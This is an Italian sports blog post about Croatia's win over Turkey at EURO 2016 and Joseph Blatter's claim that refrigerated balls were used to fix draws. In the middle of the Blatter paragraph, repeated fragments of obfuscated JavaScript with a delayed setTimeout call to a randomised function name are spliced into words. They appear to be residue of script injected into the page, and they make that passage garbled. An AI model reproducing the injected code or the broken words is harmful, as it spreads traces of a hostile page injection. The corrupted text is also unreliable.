The Locker Room

BLATTER SPLATTER

16 giugno 2016 Soccer Lab, Speak About
bla

La Croazia della gara inaugurale, quella giocata e vinta contro la Turchia, ha stupito in molti non soltanto per la qualità dei singoli ma soprattutto per il guizzo nelle idee, la velocità delle ripartenze e la personalità propria di tutti e tre i reparti. Ebbene, la Croazia è stata fin da subito una buona notizia per gli Azzurri. Perchè? Perchè nella fase di qualificazioni a EURO 2016 gli abbiamo messi dietro nonostante l’effettivo valore assoluto di un centrocampo che a mio avviso vede schierati due tra i migliori attuali interpreti nel ruolo: Rakitic e Modric.
Loro migliori, noi avanti. Perchè più guerrieri, più esperti, più pressanti. Eccellenti nello sfruttare il nostro jolly, la difesa, e cinici nel portare sempre a casa il risultato.
Sappiate che basta un frigorifero per truccare un intero sorteggio. A dircelo è Joseph Blatter, Presidente FIFA dal 1998 al 2016 che dopo circa cento anni trascorsi appiccicato alle poltrone del grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande calcio ha miracolosamente ritrovato la memoria, portandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando alla luce una torbida storia dove ad essere coinvolti sarebbero i più alti vertici del potere del calcio di tutti i tempi.“Solo uno, in Europa, aveva il potere di pilotare i sorteggi: Artemio Franchi. Lo faceva per i tornei per club. Io non l’ho mai fatto, ma ho visto farlo..”.Lui non lo ha mai fatto naturalmente. Anche se saprebbe dirvi passaggio dopo passaggio come si svolgeva il taroccamento.”Si mettono le palline in frigo. Si fa un semplice confronto tra loro e chi sorteggia sa già quale estrarre dall’urna”.
Condannato assieme all’ex Presidente dell’UEFA Platini per corruzione, Blatter è per la credibilità del calcio un personaggio negativo. Tossico. E a quanto pare anche corrotto. Blatter è il perfetto cartello per chi brama un calcio per pochi e soprattutto di pochi.
Blatter a suo dire è innocente anche perchè il colpevole è uno solo. Un personaggio considerato fino a questo momento integerrimo (le accuse mossegli dal giornalista inglese Glanville nel 1974 non furono mai provate in tribunale, anzi ritenute prive di ogni fondamento) e soprattutto morto dal 1983, quindi incapace di difendere la propria onorabilità.
E’ un vero peccato dover riscontrare come certi ricordi riaffiorino alla mente solo nella tranquillità di un ignominioso esilio dorato trascorso ben lontano dal calcio: una distanza che ci auguriamo Blatter mantenga per sempre.